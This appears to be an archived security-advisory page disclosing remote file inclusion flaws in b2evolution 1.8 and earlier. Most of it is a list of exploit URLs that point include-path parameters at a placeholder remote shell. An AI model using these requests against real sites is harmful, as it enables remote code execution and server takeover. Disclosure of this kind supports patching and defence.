Computer Security

Security Advisory: Submit ( b2evolution<= 1.8 Remote File Include Vulnerabilities )
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Vulnerability: ModernBill Insecure CURL Settings

  Уязвимости в CMS WebDirector

  phpECard (functions.
php) Remote File Inclusion Exploit

  ExBB Italian version <= v2.0 (home_path) Remote File Inclusion Exploit

From:hoangyenxinhdep_(at)_yahoo.com <hoangyenxinhdep_(at)_yahoo.com>
Date:30.08.2006
Subject:Submit ( b2evolution<= 1.8 Remote File Include Vulnerabilities )

*******************************************************************************
***                                                                                  
                 
***
***                                                                                  
                 
***
***                                                                                  
                 
***
***                                           PerSiaNFoX DigitaL SecuritY TeaM                        
***                                                                                  
                  
***                                                                                  
                 
***
***                                                                                  
                 
***
***                                                                                  
                 
***
*******************************************************************************

<#  b2evolution<= 1.8 Remote File Include Vulnerabilities

<# Script.............. : b2evolution
<# Discovered By.... : Root3r_H3ll      
<# Location .......... : Iran
<# Class..............  : Remote
<# Original Advisory : http://Www.PersainFox.com
<# We ArE : Root3r_H3LL , Arash.RJ
<#Spical TNX HB Team , All My Freinds

---------------------------------------------------------------------------------
----------------------------

< # CodE :require $inc_path.'_blog_main.inc.php'

< #Expolit :
< #http://Www.Site.CoM/[Path]/blogs/admin.php?inc_path=Sh3ll
< #http://Www.Site.CoM/[Path]/blogs/index.php?inc_path=Sh3ll
< #http://Www.Site.CoM/[Path]/blogs/default.php?inc_path=Sh3ll
< #http://Www.Site.CoM/[Path]/blogs/multiblogs.php?inc_path=Sh3ll
< #http://Www.Site.CoM/[Path]/blogs/summary.php?inc_path=Sh3ll
< #http://Www.Site.CoM/[Path]/blogs/cron/getmail.php?inc_path=Sh3ll
< #http://Www.Site.CoM/[Path]/blogs/cron/cron_exec.php?inc_path=Sh3ll
< #http://Www.Site.CoM/[Path]/blogs/cron/cron_exec.php?model_path=Sh3ll

< # CodE :   require $misc_inc_path.'_log.class.php'

< #Expolit :
< #http://Www.Site.coM/[Path]/gettext/ststicfiles.php?misc_inc_path= Sh3ll

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru